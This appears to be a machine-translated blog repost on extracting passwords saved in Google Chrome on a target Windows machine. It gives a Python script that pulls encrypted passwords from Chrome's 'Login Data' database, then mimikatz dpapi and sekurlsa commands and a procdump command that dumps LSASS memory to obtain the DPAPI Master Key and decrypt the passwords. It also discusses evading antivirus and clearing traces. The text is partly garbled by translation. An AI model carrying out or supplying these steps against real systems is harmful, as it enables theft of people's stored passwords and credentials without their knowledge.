Read Google browser to save passwords

Others 2019-11-27 15:52:59 views: null

Introduction: Both methods can achieve a mimikatz dpapi, there is a use ChromePass tool use, each with its own advantages it

The first: the use of mimikatz dpapi get Master Key to decrypt

We must first understand the concept:

DPAPI:
全称Data Protection Application Programming Interface

DPAPI blob:
一段密文,可使用Master Key对其解密

Master Key:
64字节,用于解密DPAPI blob,使用用户登录密码、SID和16字节随机数加密后保存在Master Key file中

Master Key file:
二进制文件,可使用用户登录密码对其解密,获得Master Key

Implementation:

1, to read the database files using python Login Data and extract the ciphertext

from os import getenv
import sqlite3
import binascii
conn = sqlite3.connect("Login Data")
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
    print (binascii.b2a_hex(result[2]))
    f = open('test.txt', 'wb')
    f.write(result[2])
    f.close()

2, corresponding to obtain the corresponding get guidMasterkey:
dpapi::blob /in:test.txt


That Master Key file path for the% APPDATA% \ Microsoft \ Protect% SID% \ e7ddf239-ec80-45f7-8892-1a0a90c7d77e

3, then reading the stored lsass Master Key, there are two ways

The first: to read online directly on the target machine:
mimikatz.exe privilege::debug "sekurlsa::dpapi" exit

The second: to read offline, use procdump dump the LSASS process memory
procdump.exe -accepteula -ma lsass.exe lsass.dmp
and then read the local

sekurlsa::minidump lsass.dmp
sekurlsa::dpapi

Note: After mimikatz extracted from the Master Key lsass process, will be automatically added to the Master Key System Cache

More than two ways to look at the situation, a way to bypass anti-virus - A faster, but need to clean up the traces, each with its own benefits of it

4, the use of decryption masterkey

The Master Key here is: 94ecd8123fbf517a4585f077d172332f5b396f5de7c26bd82bf5951e4b979be24c2692f21048762442f10d4dd8b3daa28ea785846689d08d723bc3a9e86d8224

dpapi::blob /in test.txt

参考文章:
1、https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E5%88%A9%E7%94%A8Masterkey%E7%A6%BB%E7%BA%BF%E5%AF%BC%E5%87%BAChrome%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81/
2、https://www.t00ls.net/viewthread.php?tid=52330&highlight=chrome

Guess you like

Origin www.cnblogs.com/zpchcbd/p/11942502.html
Recommended
The “35-year-old curse” of Chinese coders
蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版,免费下载
Ranking
Methods and Practices of Manufacturing Data Quality Improvement
Serial port upgrade program for efficient transmission of large firmware
Use KITTI to run LIOSAM and complete the EVO evaluation
Calling methods on string literals (Java)
ActiveMQ and Spring integration (4)
You have to know the HTTPS! ! !
PAT whether Structures and Algorithms 7-4 with a binary search tree (40 rows streamlined structure)
el-upload brings request background
UVA - 1204 Fun Game-like pressure dp
2019-12-28
Daily
More
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)

Code World

© 2018 codetd.com